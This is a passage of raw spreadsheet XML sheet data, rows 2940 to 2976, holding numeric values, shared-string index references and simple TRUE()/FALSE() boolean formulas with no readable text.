      <c r="T2940" t="s">
        <v>7</v>
      </c>
      <c r="U2940" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2941" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2941" s="1">
        <v>19309</v>
      </c>
      <c r="B2941" t="s">
        <v>10</v>
      </c>
      <c r="C2941" t="s">
        <v>67</v>
      </c>
      <c r="D2941" t="s">
        <v>3513</v>
      </c>
      <c r="E2941" t="s">
        <v>3507</v>
      </c>
      <c r="F2941">
        <v>1300</v>
      </c>
      <c r="G2941" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2941" t="s">
        <v>3516</v>
      </c>
      <c r="K2941">
        <v>0</v>
      </c>
      <c r="L2941" t="s">
        <v>3515</v>
      </c>
      <c r="R2941" t="s">
        <v>5</v>
      </c>
      <c r="S2941" t="s">
        <v>3510</v>
      </c>
      <c r="T2941" t="s">
        <v>7</v>
      </c>
      <c r="U2941" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2942" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2942" s="1">
        <v>19310</v>
      </c>
      <c r="B2942" t="s">
        <v>10</v>
      </c>
      <c r="C2942" t="s">
        <v>11</v>
      </c>
      <c r="D2942" t="s">
        <v>3513</v>
      </c>
      <c r="E2942" t="s">
        <v>3507</v>
      </c>
      <c r="F2942">
        <v>1300</v>
      </c>
      <c r="G2942" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2942" t="s">
        <v>3517</v>
      </c>
      <c r="K2942">
        <v>0</v>
      </c>
      <c r="L2942" t="s">
        <v>3515</v>
      </c>
      <c r="R2942" t="s">
        <v>5</v>
      </c>
      <c r="S2942" t="s">
        <v>3510</v>
      </c>
      <c r="T2942" t="s">
        <v>7</v>
      </c>
      <c r="U2942" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2943" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2943" s="1">
        <v>19311</v>
      </c>
      <c r="B2943" t="s">
        <v>10</v>
      </c>
      <c r="C2943" t="s">
        <v>64</v>
      </c>
      <c r="D2943" t="s">
        <v>3513</v>
      </c>
      <c r="E2943" t="s">
        <v>3507</v>
      </c>
      <c r="F2943">
        <v>1300</v>
      </c>
      <c r="G2943" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2943" t="s">
        <v>3518</v>
      </c>
      <c r="K2943">
        <v>0</v>
      </c>
      <c r="L2943" t="s">
        <v>3519</v>
      </c>
      <c r="R2943" t="s">
        <v>5</v>
      </c>
      <c r="S2943" t="s">
        <v>3510</v>
      </c>
      <c r="T2943" t="s">
        <v>7</v>
      </c>
      <c r="U2943" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2944" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2944" s="1">
        <v>19312</v>
      </c>
      <c r="B2944" t="s">
        <v>10</v>
      </c>
      <c r="C2944" t="s">
        <v>67</v>
      </c>
      <c r="D2944" t="s">
        <v>3513</v>
      </c>
      <c r="E2944" t="s">
        <v>3507</v>
      </c>
      <c r="F2944">
        <v>1300</v>
      </c>
      <c r="G2944" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2944" t="s">
        <v>3520</v>
      </c>
      <c r="K2944">
        <v>0</v>
      </c>
      <c r="L2944" t="s">
        <v>3519</v>
      </c>
      <c r="R2944" t="s">
        <v>5</v>
      </c>
      <c r="S2944" t="s">
        <v>3510</v>
      </c>
      <c r="T2944" t="s">
        <v>7</v>
      </c>
      <c r="U2944" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2945" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2945" s="1">
        <v>19313</v>
      </c>
      <c r="B2945" t="s">
        <v>10</v>
      </c>
      <c r="C2945" t="s">
        <v>11</v>
      </c>
      <c r="D2945" t="s">
        <v>3513</v>
      </c>
      <c r="E2945" t="s">
        <v>3507</v>
      </c>
      <c r="F2945">
        <v>1300</v>
      </c>
      <c r="G2945" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2945" t="s">
        <v>3521</v>
      </c>
      <c r="K2945">
        <v>0</v>
      </c>
      <c r="L2945" t="s">
        <v>3519</v>
      </c>
      <c r="R2945" t="s">
        <v>5</v>
      </c>
      <c r="S2945" t="s">
        <v>3510</v>
      </c>
      <c r="T2945" t="s">
        <v>7</v>
      </c>
      <c r="U2945" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2946" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2946" s="1">
        <v>19314</v>
      </c>
      <c r="B2946" t="s">
        <v>10</v>
      </c>
      <c r="C2946" t="s">
        <v>64</v>
      </c>
      <c r="D2946" t="s">
        <v>3513</v>
      </c>
      <c r="E2946" t="s">
        <v>3507</v>
      </c>
      <c r="F2946">
        <v>1300</v>
      </c>
      <c r="G2946" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2946" t="s">
        <v>3522</v>
      </c>
      <c r="K2946">
        <v>0</v>
      </c>
      <c r="L2946" t="s">
        <v>3523</v>
      </c>
      <c r="R2946" t="s">
        <v>5</v>
      </c>
      <c r="S2946" t="s">
        <v>3510</v>
      </c>
      <c r="T2946" t="s">
        <v>7</v>
      </c>
      <c r="U2946" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2947" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2947" s="1">
        <v>19315</v>
      </c>
      <c r="B2947" t="s">
        <v>10</v>
      </c>
      <c r="C2947" t="s">
        <v>67</v>
      </c>
      <c r="D2947" t="s">
        <v>3513</v>
      </c>
      <c r="E2947" t="s">
        <v>3507</v>
      </c>
      <c r="F2947">
        <v>1300</v>
      </c>
      <c r="G2947" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2947" t="s">
        <v>3524</v>
      </c>
      <c r="K2947">
        <v>0</v>
      </c>
      <c r="L2947" t="s">
        <v>3523</v>
      </c>
      <c r="R2947" t="s">
        <v>5</v>
      </c>
      <c r="S2947" t="s">
        <v>3510</v>
      </c>
      <c r="T2947" t="s">
        <v>7</v>
      </c>
      <c r="U2947" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2948" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2948" s="1">
        <v>19316</v>
      </c>
      <c r="B2948" t="s">
        <v>10</v>
      </c>
      <c r="C2948" t="s">
        <v>11</v>
      </c>
      <c r="D2948" t="s">
        <v>3513</v>
      </c>
      <c r="E2948" t="s">
        <v>3507</v>
      </c>
      <c r="F2948">
        <v>1300</v>
      </c>
      <c r="G2948" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2948" t="s">
        <v>3525</v>
      </c>
      <c r="K2948">
        <v>0</v>
      </c>
      <c r="L2948" t="s">
        <v>3523</v>
      </c>
      <c r="R2948" t="s">
        <v>5</v>
      </c>
      <c r="S2948" t="s">
        <v>3510</v>
      </c>
      <c r="T2948" t="s">
        <v>7</v>
      </c>
      <c r="U2948" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2949" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2949" s="1">
        <v>19317</v>
      </c>
      <c r="B2949" t="s">
        <v>10</v>
      </c>
      <c r="C2949" t="s">
        <v>64</v>
      </c>
      <c r="D2949" t="s">
        <v>3513</v>
      </c>
      <c r="E2949" t="s">
        <v>3507</v>
      </c>
      <c r="F2949">
        <v>1300</v>
      </c>
      <c r="G2949" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2949" t="s">
        <v>3526</v>
      </c>
      <c r="K2949">
        <v>0</v>
      </c>
      <c r="L2949" t="s">
        <v>3527</v>
      </c>
      <c r="R2949" t="s">
        <v>5</v>
      </c>
      <c r="S2949" t="s">
        <v>3510</v>
      </c>
      <c r="T2949" t="s">
        <v>7</v>
      </c>
      <c r="U2949" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2950" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2950" s="1">
        <v>19318</v>
      </c>
      <c r="B2950" t="s">
        <v>10</v>
      </c>
      <c r="C2950" t="s">
        <v>67</v>
      </c>
      <c r="D2950" t="s">
        <v>3513</v>
      </c>
      <c r="E2950" t="s">
        <v>3507</v>
      </c>
      <c r="F2950">
        <v>1300</v>
      </c>
      <c r="G2950" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2950" t="s">
        <v>3528</v>
      </c>
      <c r="K2950">
        <v>0</v>
      </c>
      <c r="L2950" t="s">
        <v>3527</v>
      </c>
      <c r="R2950" t="s">
        <v>5</v>
      </c>
      <c r="S2950" t="s">
        <v>3510</v>
      </c>
      <c r="T2950" t="s">
        <v>7</v>
      </c>
      <c r="U2950" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2951" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2951" s="1">
        <v>19319</v>
      </c>
      <c r="B2951" t="s">
        <v>10</v>
      </c>
      <c r="C2951" t="s">
        <v>11</v>
      </c>
      <c r="D2951" t="s">
        <v>3513</v>
      </c>
      <c r="E2951" t="s">
        <v>3507</v>
      </c>
      <c r="F2951">
        <v>1300</v>
      </c>
      <c r="G2951" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2951" t="s">
        <v>3529</v>
      </c>
      <c r="K2951">
        <v>0</v>
      </c>
      <c r="L2951" t="s">
        <v>3527</v>
      </c>
      <c r="R2951" t="s">
        <v>5</v>
      </c>
      <c r="S2951" t="s">
        <v>3510</v>
      </c>
      <c r="T2951" t="s">
        <v>7</v>
      </c>
      <c r="U2951" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2952" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2952" s="1">
        <v>19320</v>
      </c>
      <c r="B2952" t="s">
        <v>10</v>
      </c>
      <c r="C2952" t="s">
        <v>64</v>
      </c>
      <c r="D2952" t="s">
        <v>3530</v>
      </c>
      <c r="E2952" t="s">
        <v>3507</v>
      </c>
      <c r="F2952">
        <v>185</v>
      </c>
      <c r="G2952" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2952" t="s">
        <v>3531</v>
      </c>
      <c r="K2952">
        <v>0</v>
      </c>
      <c r="L2952" t="s">
        <v>3532</v>
      </c>
      <c r="R2952" t="s">
        <v>5</v>
      </c>
      <c r="S2952" t="s">
        <v>3510</v>
      </c>
      <c r="T2952" t="s">
        <v>7</v>
      </c>
      <c r="U2952" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2953" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2953" s="1">
        <v>19321</v>
      </c>
      <c r="B2953" t="s">
        <v>10</v>
      </c>
      <c r="C2953" t="s">
        <v>67</v>
      </c>
      <c r="D2953" t="s">
        <v>3530</v>
      </c>
      <c r="E2953" t="s">
        <v>3507</v>
      </c>
      <c r="F2953">
        <v>185</v>
      </c>
      <c r="G2953" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2953" t="s">
        <v>3533</v>
      </c>
      <c r="K2953">
        <v>0</v>
      </c>
      <c r="L2953" t="s">
        <v>3532</v>
      </c>
      <c r="R2953" t="s">
        <v>5</v>
      </c>
      <c r="S2953" t="s">
        <v>3510</v>
      </c>
      <c r="T2953" t="s">
        <v>7</v>
      </c>
      <c r="U2953" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2954" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2954" s="1">
        <v>19322</v>
      </c>
      <c r="B2954" t="s">
        <v>10</v>
      </c>
      <c r="C2954" t="s">
        <v>11</v>
      </c>
      <c r="D2954" t="s">
        <v>3530</v>
      </c>
      <c r="E2954" t="s">
        <v>3507</v>
      </c>
      <c r="F2954">
        <v>185</v>
      </c>
      <c r="G2954" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2954" t="s">
        <v>3534</v>
      </c>
      <c r="K2954">
        <v>0</v>
      </c>
      <c r="L2954" t="s">
        <v>3532</v>
      </c>
      <c r="R2954" t="s">
        <v>5</v>
      </c>
      <c r="S2954" t="s">
        <v>3510</v>
      </c>
      <c r="T2954" t="s">
        <v>7</v>
      </c>
      <c r="U2954" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2955" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2955" s="1">
        <v>19323</v>
      </c>
      <c r="B2955" t="s">
        <v>13</v>
      </c>
      <c r="C2955" t="s">
        <v>14</v>
      </c>
      <c r="D2955" t="s">
        <v>3507</v>
      </c>
      <c r="E2955" t="s">
        <v>3507</v>
      </c>
      <c r="F2955">
        <v>0</v>
      </c>
      <c r="G2955" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2955" t="s">
        <v>3535</v>
      </c>
      <c r="K2955">
        <v>0</v>
      </c>
      <c r="R2955" t="s">
        <v>5</v>
      </c>
      <c r="S2955" t="s">
        <v>3510</v>
      </c>
      <c r="T2955" t="s">
        <v>7</v>
      </c>
      <c r="U2955" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="2956" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2956" s="1">
        <v>19324</v>
      </c>
      <c r="B2956" t="s">
        <v>44</v>
      </c>
      <c r="C2956" t="s">
        <v>45</v>
      </c>
      <c r="D2956" t="s">
        <v>3536</v>
      </c>
      <c r="E2956" t="s">
        <v>3537</v>
      </c>
      <c r="F2956">
        <v>12200</v>
      </c>
      <c r="G2956" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2956" t="s">
        <v>3538</v>
      </c>
      <c r="K2956">
        <v>0</v>
      </c>
      <c r="L2956" t="s">
        <v>1002</v>
      </c>
      <c r="R2956" t="s">
        <v>20</v>
      </c>
      <c r="S2956" t="s">
        <v>3539</v>
      </c>
      <c r="T2956" t="s">
        <v>7</v>
      </c>
      <c r="U2956" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2957" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2957" s="1">
        <v>19325</v>
      </c>
      <c r="B2957" t="s">
        <v>13</v>
      </c>
      <c r="C2957" t="s">
        <v>14</v>
      </c>
      <c r="D2957" t="s">
        <v>3536</v>
      </c>
      <c r="E2957" t="s">
        <v>3537</v>
      </c>
      <c r="F2957">
        <v>12200</v>
      </c>
      <c r="G2957" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2957" t="s">
        <v>3540</v>
      </c>
      <c r="K2957">
        <v>0</v>
      </c>
      <c r="L2957" t="s">
        <v>3541</v>
      </c>
      <c r="R2957" t="s">
        <v>20</v>
      </c>
      <c r="S2957" t="s">
        <v>3539</v>
      </c>
      <c r="T2957" t="s">
        <v>7</v>
      </c>
      <c r="U2957" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2958" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2958" s="1">
        <v>19326</v>
      </c>
      <c r="B2958" t="s">
        <v>13</v>
      </c>
      <c r="C2958" t="s">
        <v>14</v>
      </c>
      <c r="D2958" t="s">
        <v>3536</v>
      </c>
      <c r="E2958" t="s">
        <v>3537</v>
      </c>
      <c r="F2958">
        <v>12200</v>
      </c>
      <c r="G2958" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2958" t="s">
        <v>3542</v>
      </c>
      <c r="K2958">
        <v>0</v>
      </c>
      <c r="L2958" t="s">
        <v>609</v>
      </c>
      <c r="R2958" t="s">
        <v>20</v>
      </c>
      <c r="S2958" t="s">
        <v>3539</v>
      </c>
      <c r="T2958" t="s">
        <v>7</v>
      </c>
      <c r="U2958" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2959" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2959" s="1">
        <v>19327</v>
      </c>
      <c r="B2959" t="s">
        <v>10</v>
      </c>
      <c r="C2959" t="s">
        <v>57</v>
      </c>
      <c r="D2959" t="s">
        <v>3543</v>
      </c>
      <c r="E2959" t="s">
        <v>3537</v>
      </c>
      <c r="F2959">
        <v>12199</v>
      </c>
      <c r="G2959" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2959" t="s">
        <v>3544</v>
      </c>
      <c r="K2959">
        <v>0</v>
      </c>
      <c r="R2959" t="s">
        <v>20</v>
      </c>
      <c r="S2959" t="s">
        <v>3539</v>
      </c>
      <c r="T2959" t="s">
        <v>7</v>
      </c>
      <c r="U2959" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2960" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2960" s="1">
        <v>19328</v>
      </c>
      <c r="B2960" t="s">
        <v>10</v>
      </c>
      <c r="C2960" t="s">
        <v>57</v>
      </c>
      <c r="D2960" t="s">
        <v>3543</v>
      </c>
      <c r="E2960" t="s">
        <v>3537</v>
      </c>
      <c r="F2960">
        <v>12199</v>
      </c>
      <c r="G2960" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2960" t="s">
        <v>3545</v>
      </c>
      <c r="K2960">
        <v>0</v>
      </c>
      <c r="R2960" t="s">
        <v>20</v>
      </c>
      <c r="S2960" t="s">
        <v>3539</v>
      </c>
      <c r="T2960" t="s">
        <v>7</v>
      </c>
      <c r="U2960" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2961" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2961" s="1">
        <v>19329</v>
      </c>
      <c r="B2961" t="s">
        <v>10</v>
      </c>
      <c r="C2961" t="s">
        <v>64</v>
      </c>
      <c r="D2961" t="s">
        <v>3543</v>
      </c>
      <c r="E2961" t="s">
        <v>3537</v>
      </c>
      <c r="F2961">
        <v>12199</v>
      </c>
      <c r="G2961" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2961" t="s">
        <v>3546</v>
      </c>
      <c r="K2961">
        <v>0</v>
      </c>
      <c r="R2961" t="s">
        <v>20</v>
      </c>
      <c r="S2961" t="s">
        <v>3539</v>
      </c>
      <c r="T2961" t="s">
        <v>7</v>
      </c>
      <c r="U2961" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2962" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2962" s="1">
        <v>19330</v>
      </c>
      <c r="B2962" t="s">
        <v>10</v>
      </c>
      <c r="C2962" t="s">
        <v>64</v>
      </c>
      <c r="D2962" t="s">
        <v>3543</v>
      </c>
      <c r="E2962" t="s">
        <v>3537</v>
      </c>
      <c r="F2962">
        <v>12199</v>
      </c>
      <c r="G2962" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2962" t="s">
        <v>3547</v>
      </c>
      <c r="K2962">
        <v>0</v>
      </c>
      <c r="R2962" t="s">
        <v>20</v>
      </c>
      <c r="S2962" t="s">
        <v>3539</v>
      </c>
      <c r="T2962" t="s">
        <v>7</v>
      </c>
      <c r="U2962" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2963" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2963" s="1">
        <v>19331</v>
      </c>
      <c r="B2963" t="s">
        <v>10</v>
      </c>
      <c r="C2963" t="s">
        <v>64</v>
      </c>
      <c r="D2963" t="s">
        <v>3543</v>
      </c>
      <c r="E2963" t="s">
        <v>3537</v>
      </c>
      <c r="F2963">
        <v>12199</v>
      </c>
      <c r="G2963" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2963" t="s">
        <v>3548</v>
      </c>
      <c r="K2963">
        <v>0</v>
      </c>
      <c r="R2963" t="s">
        <v>20</v>
      </c>
      <c r="S2963" t="s">
        <v>3539</v>
      </c>
      <c r="T2963" t="s">
        <v>7</v>
      </c>
      <c r="U2963" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2964" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2964" s="1">
        <v>19332</v>
      </c>
      <c r="B2964" t="s">
        <v>10</v>
      </c>
      <c r="C2964" t="s">
        <v>64</v>
      </c>
      <c r="D2964" t="s">
        <v>3543</v>
      </c>
      <c r="E2964" t="s">
        <v>3537</v>
      </c>
      <c r="F2964">
        <v>12199</v>
      </c>
      <c r="G2964" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2964" t="s">
        <v>3549</v>
      </c>
      <c r="K2964">
        <v>0</v>
      </c>
      <c r="R2964" t="s">
        <v>20</v>
      </c>
      <c r="S2964" t="s">
        <v>3539</v>
      </c>
      <c r="T2964" t="s">
        <v>7</v>
      </c>
      <c r="U2964" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2965" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2965" s="1">
        <v>19333</v>
      </c>
      <c r="B2965" t="s">
        <v>10</v>
      </c>
      <c r="C2965" t="s">
        <v>64</v>
      </c>
      <c r="D2965" t="s">
        <v>3543</v>
      </c>
      <c r="E2965" t="s">
        <v>3537</v>
      </c>
      <c r="F2965">
        <v>12199</v>
      </c>
      <c r="G2965" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2965" t="s">
        <v>3550</v>
      </c>
      <c r="K2965">
        <v>0</v>
      </c>
      <c r="R2965" t="s">
        <v>20</v>
      </c>
      <c r="S2965" t="s">
        <v>3539</v>
      </c>
      <c r="T2965" t="s">
        <v>7</v>
      </c>
      <c r="U2965" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2966" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2966" s="1">
        <v>19334</v>
      </c>
      <c r="B2966" t="s">
        <v>10</v>
      </c>
      <c r="C2966" t="s">
        <v>64</v>
      </c>
      <c r="D2966" t="s">
        <v>3543</v>
      </c>
      <c r="E2966" t="s">
        <v>3537</v>
      </c>
      <c r="F2966">
        <v>12199</v>
      </c>
      <c r="G2966" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2966" t="s">
        <v>3551</v>
      </c>
      <c r="K2966">
        <v>0</v>
      </c>
      <c r="R2966" t="s">
        <v>20</v>
      </c>
      <c r="S2966" t="s">
        <v>3539</v>
      </c>
      <c r="T2966" t="s">
        <v>7</v>
      </c>
      <c r="U2966" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2967" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2967" s="1">
        <v>19335</v>
      </c>
      <c r="B2967" t="s">
        <v>10</v>
      </c>
      <c r="C2967" t="s">
        <v>64</v>
      </c>
      <c r="D2967" t="s">
        <v>3543</v>
      </c>
      <c r="E2967" t="s">
        <v>3537</v>
      </c>
      <c r="F2967">
        <v>12199</v>
      </c>
      <c r="G2967" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2967" t="s">
        <v>3552</v>
      </c>
      <c r="K2967">
        <v>0</v>
      </c>
      <c r="R2967" t="s">
        <v>20</v>
      </c>
      <c r="S2967" t="s">
        <v>3539</v>
      </c>
      <c r="T2967" t="s">
        <v>7</v>
      </c>
      <c r="U2967" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2968" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2968" s="1">
        <v>19336</v>
      </c>
      <c r="B2968" t="s">
        <v>10</v>
      </c>
      <c r="C2968" t="s">
        <v>64</v>
      </c>
      <c r="D2968" t="s">
        <v>3553</v>
      </c>
      <c r="E2968" t="s">
        <v>3537</v>
      </c>
      <c r="F2968">
        <v>12198</v>
      </c>
      <c r="G2968" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2968" t="s">
        <v>3554</v>
      </c>
      <c r="K2968">
        <v>0</v>
      </c>
      <c r="R2968" t="s">
        <v>20</v>
      </c>
      <c r="S2968" t="s">
        <v>3539</v>
      </c>
      <c r="T2968" t="s">
        <v>7</v>
      </c>
      <c r="U2968" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2969" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2969" s="1">
        <v>19337</v>
      </c>
      <c r="B2969" t="s">
        <v>10</v>
      </c>
      <c r="C2969" t="s">
        <v>64</v>
      </c>
      <c r="D2969" t="s">
        <v>3553</v>
      </c>
      <c r="E2969" t="s">
        <v>3537</v>
      </c>
      <c r="F2969">
        <v>12198</v>
      </c>
      <c r="G2969" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2969" t="s">
        <v>3555</v>
      </c>
      <c r="K2969">
        <v>0</v>
      </c>
      <c r="R2969" t="s">
        <v>20</v>
      </c>
      <c r="S2969" t="s">
        <v>3539</v>
      </c>
      <c r="T2969" t="s">
        <v>7</v>
      </c>
      <c r="U2969" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2970" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2970" s="1">
        <v>19338</v>
      </c>
      <c r="B2970" t="s">
        <v>10</v>
      </c>
      <c r="C2970" t="s">
        <v>64</v>
      </c>
      <c r="D2970" t="s">
        <v>3553</v>
      </c>
      <c r="E2970" t="s">
        <v>3537</v>
      </c>
      <c r="F2970">
        <v>12198</v>
      </c>
      <c r="G2970" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2970" t="s">
        <v>3556</v>
      </c>
      <c r="K2970">
        <v>0</v>
      </c>
      <c r="R2970" t="s">
        <v>20</v>
      </c>
      <c r="S2970" t="s">
        <v>3539</v>
      </c>
      <c r="T2970" t="s">
        <v>7</v>
      </c>
      <c r="U2970" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2971" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2971" s="1">
        <v>19339</v>
      </c>
      <c r="B2971" t="s">
        <v>10</v>
      </c>
      <c r="C2971" t="s">
        <v>64</v>
      </c>
      <c r="D2971" t="s">
        <v>3553</v>
      </c>
      <c r="E2971" t="s">
        <v>3537</v>
      </c>
      <c r="F2971">
        <v>12198</v>
      </c>
      <c r="G2971" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2971" t="s">
        <v>3557</v>
      </c>
      <c r="K2971">
        <v>0</v>
      </c>
      <c r="R2971" t="s">
        <v>20</v>
      </c>
      <c r="S2971" t="s">
        <v>3539</v>
      </c>
      <c r="T2971" t="s">
        <v>7</v>
      </c>
      <c r="U2971" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2972" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2972" s="1">
        <v>19340</v>
      </c>
      <c r="B2972" t="s">
        <v>10</v>
      </c>
      <c r="C2972" t="s">
        <v>64</v>
      </c>
      <c r="D2972" t="s">
        <v>3553</v>
      </c>
      <c r="E2972" t="s">
        <v>3537</v>
      </c>
      <c r="F2972">
        <v>12198</v>
      </c>
      <c r="G2972" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2972" t="s">
        <v>3558</v>
      </c>
      <c r="K2972">
        <v>0</v>
      </c>
      <c r="R2972" t="s">
        <v>20</v>
      </c>
      <c r="S2972" t="s">
        <v>3539</v>
      </c>
      <c r="T2972" t="s">
        <v>7</v>
      </c>
      <c r="U2972" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2973" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2973" s="1">
        <v>19341</v>
      </c>
      <c r="B2973" t="s">
        <v>10</v>
      </c>
      <c r="C2973" t="s">
        <v>64</v>
      </c>
      <c r="D2973" t="s">
        <v>3553</v>
      </c>
      <c r="E2973" t="s">
        <v>3537</v>
      </c>
      <c r="F2973">
        <v>12198</v>
      </c>
      <c r="G2973" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2973" t="s">
        <v>3559</v>
      </c>
      <c r="K2973">
        <v>0</v>
      </c>
      <c r="R2973" t="s">
        <v>20</v>
      </c>
      <c r="S2973" t="s">
        <v>3539</v>
      </c>
      <c r="T2973" t="s">
        <v>7</v>
      </c>
      <c r="U2973" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2974" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2974" s="1">
        <v>19342</v>
      </c>
      <c r="B2974" t="s">
        <v>10</v>
      </c>
      <c r="C2974" t="s">
        <v>64</v>
      </c>
      <c r="D2974" t="s">
        <v>3553</v>
      </c>
      <c r="E2974" t="s">
        <v>3537</v>
      </c>
      <c r="F2974">
        <v>12198</v>
      </c>
      <c r="G2974" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2974" t="s">
        <v>3560</v>
      </c>
      <c r="K2974">
        <v>0</v>
      </c>
      <c r="R2974" t="s">
        <v>20</v>
      </c>
      <c r="S2974" t="s">
        <v>3539</v>
      </c>
      <c r="T2974" t="s">
        <v>7</v>
      </c>
      <c r="U2974" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2975" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2975" s="1">
        <v>19343</v>
      </c>
      <c r="B2975" t="s">
        <v>10</v>
      </c>
      <c r="C2975" t="s">
        <v>64</v>
      </c>
      <c r="D2975" t="s">
        <v>3553</v>
      </c>
      <c r="E2975" t="s">
        <v>3537</v>
      </c>
      <c r="F2975">
        <v>12198</v>
      </c>
      <c r="G2975" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2975" t="s">
        <v>3561</v>
      </c>
      <c r="K2975">
        <v>0</v>
      </c>
      <c r="R2975" t="s">
        <v>20</v>
      </c>
      <c r="S2975" t="s">
        <v>3539</v>
      </c>
      <c r="T2975" t="s">
        <v>7</v>
      </c>
      <c r="U2975" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2976" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2976" s="1">
        <v>19344</v>
      </c>
